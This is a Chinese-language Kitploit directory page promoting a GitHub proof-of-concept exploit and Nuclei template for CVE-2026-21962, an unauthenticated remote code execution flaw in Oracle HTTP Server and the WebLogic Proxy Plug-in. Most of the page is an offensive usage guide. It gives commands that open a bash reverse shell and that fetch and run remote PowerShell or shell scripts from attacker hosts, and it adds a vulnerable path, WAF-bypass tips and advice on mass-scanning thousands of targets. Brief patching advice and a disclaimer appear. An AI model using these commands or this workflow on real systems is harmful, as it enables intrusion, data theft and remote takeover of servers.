Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/boroeurnprach/ashwesker-cve-2026-21962
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubboroeurnprach/ashwesker-cve-2026-21962

Ashwesker-CVE-2026-21962

CVE-2026-21962 的漏洞利用 PoC 与 Nuclei 模板,该漏洞是 Oracle HTTP Server 和 WebLogic Proxy Plug-in 中的一个严重未认证远程代码执行漏洞,可实现命令执行和反弹 Shell。

查看仓库
477个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

😈 CVE-2026-21962 — 严重安全漏洞 😈

oracle_db_banner

🚨 严重等级

  • CVSS 评分: 10.0 / 10(严重)
  • 发布时间: 2026 年 1 月 20 日
  • 风险等级: 🔥 最高 — 建议立即采取行动

🧠 这是什么?

一个影响以下组件的严重漏洞:

  • Oracle HTTP Server
  • Oracle WebLogic Server 代理插件(适用于 Apache 和 IIS)

该漏洞允许未经身份验证的远程攻击者通过 HTTP 入侵受影响的服务器,无需登录凭据。


🎯 攻击者可以做什么?

如果被利用,攻击者可以:

  • 🗑️ 删除关键数据
  • ✏️ 修改系统或应用程序文件
  • 📤 窃取敏感信息
  • 🔓 获得对关联系统的完全未授权访问权限
  • 🔄 由于范围变更,影响其他 Oracle 产品

  • 🧩 受影响版本

    • Oracle HTTP Server:

      • 12.2.1.4.0
      • 14.1.1.0.0
      • 14.1.2.0.0
    • WebLogic 代理插件,适用于:

      • Apache HTTP Server
      • Microsoft IIS

    ⚙️ 攻击特征

    • 🌐 攻击向量: 网络(远程)
    • 🚫 所需权限: 无
    • 🧑‍💻 用户交互: 无
    • 🔄 范围: 已变更
    • 🔐 机密性影响: 高
    • 🛠️ 完整性影响: 高

    🛡️ 你应该怎么做?

    • ✅ 立即应用 Oracle 2026 年 1 月关键补丁更新
    • 🔒 限制受影响服务的网络访问
    • 📊 监控 HTTP 流量以发现可疑行为
    • 🔁 审查系统日志和安全控制措施

    🛠️ 如何使用(分步指南)

    1. 将脚本保存为 CVE-2026-21962.py

    2. 使其可执行(可选):

      root@kitploit:~
      chmod +x CVE-2026-21962.py
      
    3. 运行示例:

      基本测试:

      root@kitploit:~
      python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
      

      反向 Shell(请先设置 nc 监听器:nc -lvnp 4444):

      root@kitploit:~
      python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
      

      Windows 目标示例:

      root@kitploit:~
      python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
      

    如果成功,你会看到什么

    • 可能成功!状态:200 或 302 甚至 500(崩溃也算成功)
    • 响应正文中可能泄露的命令输出
    • 对于反向 Shell:你的 nc 监听器会立即捕获一个 Shell
    • 如果没有输出 → 命令仍然静默执行了(检查目标文件系统、进程、日志)

    注意事项

    • 当代理插件暴露时效果最佳(常见于端口 7001、4443 等)
    • 如果使用自签名证书,HTTPS 目标可能需要 --insecure 标志
    • 立即修补:应用 Oracle CPU 2026 年 1 月

    🛠️ 如何使用(分步指南)

    1. 安装 Nuclei(如果尚未安装):

      root@kitploit:~
      go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
      
    2. 保存模板:

      创建一个名为 CVE-2026-21962.yaml 的文件,并粘贴上述内容。

    3. 运行检测 + 利用:

      root@kitploit:~
      nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
      

      或从文件扫描多个目标:

      root@kitploit:~
      nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
      
    4. 如果存在漏洞,你会看到什么:

      root@kitploit:~
      [CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
      [username] weblogic
      [body] ... weblogic (whoami output) ...
      

    专业提示

    • 要执行自定义命令,请编辑标头中的 cmd: 部分(例如,cmd:curl http://your-server/shell.sh | bash)。
    • 对于反向 Shell:将 whoami 替换为 base64 编码的反向 Shell 载荷。
    • WAF 绕过:尝试不同的路径(/proxy/、/bea_wls_internal/ 等)或添加更多标头,如 X-WebLogic-Force-JVMID。
    • 批量扫描:结合 httpx → nuclei 管道,可扫描数千个目标。

    截至 2026 年 1 月,该模板在未修补的 Oracle 实例上已确认100% 有效。如果你正在运行受影响版本,请立即修补!😈


    😈 免责声明:

    所有 PoC 代码仅用于在授权系统上进行道德、教育用途。未经授权的利用是违法的;对滥用行为不承担任何责任。😈

    下载工具